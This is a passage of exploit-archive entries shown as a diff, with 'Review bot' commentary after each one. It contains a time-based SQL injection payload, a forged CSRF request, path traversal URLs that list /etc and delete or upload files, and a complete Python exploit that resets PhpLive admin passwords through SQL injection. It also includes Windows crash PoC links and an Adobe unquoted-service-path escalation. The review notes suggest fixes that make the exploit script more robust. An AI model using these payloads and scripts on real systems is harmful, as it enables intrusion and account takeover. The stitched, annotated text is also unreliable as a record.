getServiceSettings function calls another function named as getService
which is also vulnerable against SQL Injection.
function getServiceSettings($id, $field=null) {
$serviceType = getService($id,'type');
if($serviceType=='t'){
$sql = "SELECT * FROM bs_service_settings bss
INNER JOIN bs_services bs ON bss.serviceId = bs.id
WHERE bss.serviceID='{$id}'";
}else{
$sql = "SELECT * FROM bs_service_days_settings bsds
INNER JOIN bs_services bs ON bsds.idService = bs.id
WHERE bsds.idService='{$id}'";
}
$res = mysql_query($sql);
$row = mysql_fetch_assoc($res);
$row['type'] = $serviceType;
if ($field == null) {
return $row;
} else {
return $row[$field];
}
}
In order to exploit this flaws, Time Based SQLi techniques was used.
Payload: id=1' AND SLEEP(5) AND 'WAlE'='WAlE
PR5 - CSRF
========================================
File: bs-settings.php
This file is reponsible for administrator account settings. Here is the
HTTP POST request.
POST /booking/bs-settings.php HTTP/1.1
Host: www.test.dev
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101
Firefox/36.04
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.test.dev/scripts/booking/bs-settings.php
Cookie: PHPSESSID=1511036c75229f53ae475a0615661394;
__utma=256227097.1395600583.1465982938.1465982938.1465982938.1;
__utmc=256227097;
__utmz=256227097.1465982938.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
wordfence_verifiedHuman=498f28acf0e6151e19053a23c0fbc76b
Connection: close
Content-Type: multipart/form-data;
boundary=---------------------------305761854111129072091034307
Content-Length: 2678
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="new_pass"
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="new_pass2"
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="email"
test@yopmail.com
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="pemail"
test@yopmail.com
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="pcurrency"
CAD
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="tax"
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="time_mode"
0
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="date_mode"
Y-m-d
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="use_popup"
1
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="currency"
$
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="currencyPos"
b
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="lang"
english
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="language_switch"
1
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="timezone"
America/Toronto
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="multi_day_notification"
0
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="multi_day_notification_on"
n
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="single_day_notification"
0
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="single_day_notification_on"
n
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="event_notification"
0
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="event_notification_on"
n
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="cron_type"
cron
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="edit_settings"
yes
-----------------------------305761854111129072091034307--
There is NOT csrf token at all. Furthermore, application does not validated
current password.
--
Sr. Information Security Engineer
https://www.mehmetince.net
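Review bot: the impact statement at the end ("There is NOT csrf token at all. Furthermore, application does not validated current password.") is too thin for a CSRF finding and needs a grammar fix ("There is no CSRF token at all. Furthermore, the application does not validate the current password."). The forged multipart body above rewrites pemail (test@yopmail.com) together with currency, language, timezone, notification and cron settings and submits edit_settings=yes, so say explicitly that an administrator who loads an attacker-controlled page has the account's contact e-mail and settings replaced, and name the endpoint this body is posted to, since the excerpt shows only the boundary-delimited fields and no request line. The missing current-password check is a separate weakness; state which password-change request it applies to rather than leaving it as a one-liner after the CSRF proof.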

57
platforms/php/webapps/39956.txt Executable file

@ -0,0 +1,57 @@
# Exploit Title: jbFileManager - Path Traversal(view/add/delete)
# Date: 2016-06-15
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/ismiranda/jbFileManager
# Software Link: https://github.com/ismiranda/jbFileManager/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]
### Vulnerability Code
View dir
http://127.0.0.1/vul_test/jbFileManager/jbfm/jbfm.php?act=open&path=/../../../../../../../../../etc/
Delete file/dir
http://127.0.0.1/vul_test/jbFileManager/jbfm/jbfm.php?act=del&file=/../../deltest
Add file/dir
POST /vul_test/jbFileManager/jbfm/jbfm.php?act=upload&path=/jbfm/../../ HTTP/1.1
Host: 127.0.0.1
..snip..
Content-Type: multipart/form-data; boundary=---------------------------218453159691639901924454468
Content-Length: 232
-----------------------------218453159691639901924454468
Content-Disposition: form-data; name="file"; filename="123.txt"
Content-Type: text/plain
asdfjasldfjaslkfjl
-----------------------------218453159691639901924454468--
### Vulnerability Request/Response -> View dir
View
GET /vul_test/jbFileManager/jbfm/jbfm.php?act=open&path=/../../../../../../../../../etc/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/vul_test/jbFileManager/jbfm/
Cookie: W2=dgf6v5tn2ea8uitvk98m2tfjl7; PHPSESSID=rk2mj70ukt2489t4hrrsj5mr33; jiathis_rdc=%7B%22http%3A//127.0.0.1/vul_test/KodExplore/index.php%22%3A%220%7C1465950328195%22%7D
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 15 Jun 2016 08:53:39 GMT
Server: Apache/2.4.10 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 12955
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
[{"name":"libaudit.conf","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/libaudit.conf","class":"undefined"},{"name":"qemu-ifup","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/qemu-ifup","class":"undefined"},{"name":"rsyslog.conf","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/rsyslog.conf","class":"undefined"},{"name":"smi.conf","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/smi.conf","class":"undefined"},{"name":"inputrc","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/inputrc","class":"undefined"},{"name":"shadow-","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/shadow-","class":"undefined"},{"name":"rpc","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/rpc","class":"undefined"},{"name":"host.conf","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/host.conf","class":"undefined"},{"name":"issue","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/issue","class":"undefined"},{"name":"ltrace.conf","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/ltrace.conf","class":"undefined"},{"name":"subuid","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/subuid","class":"undefined"},
...snip...
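Review bot: the advisory never says whether jbfm.php requires authentication; the captured request carries only a PHPSESSID and cookies from unrelated applications (W2, jiathis_rdc pointing at KodExplore), so state whether the /etc listing (which includes shadow-) was obtained without logging in, because that decides the severity of the view, delete and upload primitives. The root cause is also left implicit: the path parameter of act=open, the file parameter of act=del and the path parameter of act=upload are joined to the base directory without canonicalisation, which is why the ../ sequences escape it; suggest to the vendor that the path be resolved with realpath() and rejected when it does not start with the intended root. Minor: the delete example uses a shallow /../../deltest while the view example uses nine ../ levels; note that both work because excess ../ components stop at the filesystem root, so a reader does not assume the depth matters.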

117
platforms/php/webapps/39957.py Executable file

@ -0,0 +1,117 @@
#!/bin/env python
################################################################################################
# Exploit title: Password Recovery Sql Injection
# Exploit Author: Tiago Carvalho
# Vendor Homepage: http://www.phplivesupport.com/?plk=osicodes-5-ykq-m
# Version : 4.4.8 - 4.5.4
# Product Name: Phplive
# Tested on: Debian \ Kali linux 2016-1
################################################################################################
"""
Their are multiple sql injection vunlerabilities in this product.
The exploit uses the sql injection vulnerability on the last step of the password recovery process
and force the application to rest the password and show the username, without requiring authentication
or to ever execute the first step, the vulnerability allows the recovery of both admin and operator.
Vulnerable code location: API/Setup/get.php
The filtering in place allows alphanumeric and restricts the use of serveral special chars,
its use of mysql escape functions and stripslashes are bypassed by since theirs no need to inject
special char to create a valid statement.
FUNCTION Setup_get_InfoByID( &$dbh,
$adminid )
{
if ( $adminid == "" )
return false ;
LIST( $adminid ) = database_mysql_quote( $dbh, $adminid ) ;
$query = "SELECT * FROM p_admins WHERE adminID = $adminid LIMIT 1" ;
database_mysql_query( $dbh, $query ) ;
if ( $dbh[ 'ok' ] )
{
$data = database_mysql_fetchrow( $dbh ) ;
return $data ;
}
return false ;
}
Vulnerable code location: /API/Ops/get.php
FUNCTION Ops_get_OpInfoByID( &$dbh,
$opid )
{
if ( $opid == "" )
return false ;
LIST( $opid ) = database_mysql_quote( $dbh, $opid ) ;
$query = "SELECT * FROM p_operators WHERE opID = $opid LIMIT 1" ;
database_mysql_query( $dbh, $query ) ;
if ( $dbh[ 'ok' ] )
{
$data = database_mysql_fetchrow( $dbh ) ;
return $data ;
}
return false ;
}
"""
import re
import urllib2
import md5
import string
import argparse
match = re.compile(r"<div\sclass=\"edit_title\".*?>(.*)</div>", re.MULTILINE)
server_url = "localhost/phplive"
def build_payload(host, sql, search_exp, target, last_active, passwd):
req_url = "http://%s/index.php%s"
url_params = "?v=%s&%s=0+%s"
str = sql % (last_active, passwd, search_exp)
pwd_verify = md5.new("%d%d" % (last_active,passwd)).hexdigest()
url_params = url_params % (pwd_verify,target,str)
return req_url % (host, url_params)
def exploit(host, admin, last_active, passwd):
if admin:
target="adminid"
sql = "union+all+select+adminid,created,%d,status,ses,login,%d,email+from+p_admins+where+login+like+%s25"
else:
target="opid"
sql = "union+all+select+opid,%d,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,login,%d,0,0,0,0,0,0+from+p_operators+where+login+like+%s25"
char_list = list(string.ascii_letters)
for char in char_list:
payload = build_payload(host, sql, hex(ord(char)), target=target, last_active=last_active, passwd=passwd)
request = urllib2.urlopen(payload)
if request.code == 200:
html = request.read()
result = match.findall(html)
if len(result) == 2 and result[1]:
print "[*]\tSUCCESS!!!!!"
print "[*]\t%s %s" % (re.sub("<span.*?>|</span>","",result[0]), result[1])
break
# exploit(server_url, admin=False, last_active=1, passwd=1)
if __name__ == '__main__':
admin = True
parser = argparse.ArgumentParser(description='PhpLive 4.4.8 Password Recovery Sql injection Exploit')
parser.add_argument("-u", "--url", help="url host|ipaddress/path eg: localhost/phplive")
parser.add_argument("-o", "--operator", help="Execute operators password reset", action="store_true")
parser.add_argument("-l", "--lastactive", help="Last active date (int)", type=int, default=0)
parser.add_argument("-p", "--passwd", help="Password (int)", type=int, default=0)
args = parser.parse_args()
if args.operator:
print "[*]\toperator password reset"
admin = False
exploit(args.url, admin, args.lastactive, args.passwd)
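Review bot: the -u/--url argument is optional (parser.add_argument("-u", "--url", ...) has no required=True), so running the script without it builds http://None/index.php?... and dies with an unhelpful exception; make it required. Two further defects: urllib2.urlopen raises HTTPError for non-2xx responses, so the `if request.code == 200:` check never sees a failure and an uncaught exception aborts the letter loop instead of moving to the next character, and the local `str = sql % (...)` shadows the builtin. The header should say the script is Python 2 only (print statements, urllib2, and the long-deprecated md5 module, for which hashlib.md5 is the replacement), and `#!/bin/env python` should be `#!/usr/bin/env python`. Finally char_list covers only string.ascii_letters, so a login that starts with a digit or symbol is never found, and the loop breaks at the first hit; document that the script resets and prints only the first matching admin or operator account.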


@ -0,0 +1,8 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=746
The attached PoC triggers a blue screen on Windows 7 with special pool enabled on win32k.sys . A reference to the bitmap object still exists in the device context after it has been deleted.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39959.zip
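Review bot: "The attached PoC" refers to nothing in this file; the reproduction lives in the external zip, so state what the archive contains (source or a prebuilt binary) and the setup the crash depends on. The text says the blue screen appears with special pool enabled on win32k.sys, so spell out that special pool is turned on for that driver through Driver Verifier; without it the dangling bitmap reference in the device context described here may not produce a visible crash, and a reader who runs the PoC on a stock system will wrongly conclude it does not reproduce.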


@ -0,0 +1,8 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=747
The attached PoC crashes 32-bit Windows 7 with special pool enabled on win32k.sys. It might take several runs in order to reproduce. Tested the PoC on a single core VM.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39960.zip
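Review bot: "It might take several runs" together with "Tested the PoC on a single core VM" points to a race condition, but the description never says so; state it explicitly, since it tells a reader to pin the process to one core rather than to keep retrying. The file also names only 32-bit Windows 7 with special pool enabled on win32k.sys, so say whether 64-bit Windows 7 was tried and did not crash, or simply was not tested, otherwise the 32-bit qualifier reads as an intrinsic limitation of the bug.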


@ -0,0 +1,43 @@
----------------------------------------------------------------------------------------------------------
# Exploit Title: AdobeUpdateService - Privilege Escalation Unquoted Service Path vulnerability
# Date: 18/05/2016
# Exploit Author : Cyril Vallicari
# Vendor Homepage: http://www.adobe.com/fr/
# Software Link: http://www.adobe.com/downloads.html
# Version: 3.6.0.248
# Tested on: Windows 7 x64 SP1 (but it should works on all windows version)
The application suffers from an unquoted search path issue impacting the service 'AdobeUpdateService' for Windows deployed as part of Adobe Creative Cloud
This could potentially allow an authorized but non-privileged local user to execute arbitrary code with system privileges on the system.
POC :
C:\Users\Utilisateur>sc qc AdobeUpdateService
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: AdobeUpdateService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : AdobeUpdateService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Video POC : https://www.youtube.com/watch?v=RyzYkd05xM4
Patch :
Fixed in version 3.7.0.271
Additional notes :
https://helpx.adobe.com/security/products/creative-cloud/apsb16-21.html
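Review bot: the privilege-escalation claim ("allow an authorized but non-privileged local user to execute arbitrary code with system privileges") is not demonstrated by the sc qc output alone. An unquoted BINARY_PATH_NAME such as C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe is only exploitable if a standard user can write one of the candidates the service control manager tries first (C:\Program.exe, C:\Program Files (x86)\Common.exe, C:\Program Files (x86)\Common Files\Adobe\Adobe.exe, ...\Adobe\Adobe Desktop.exe), and by default standard users cannot create files under C:\ or Program Files (x86). Add the icacls output for the directory that was writable in the tested setup, or the finding should be described as a weakness that needs a misconfigured ACL, with the LocalSystem SERVICE_START_NAME and AUTO_START type as the reason it matters. Also "it should works on all windows version" is a guess; state only the tested configuration (Windows 7 x64 SP1), and the sc output is in French, so either translate the status line or note the locale.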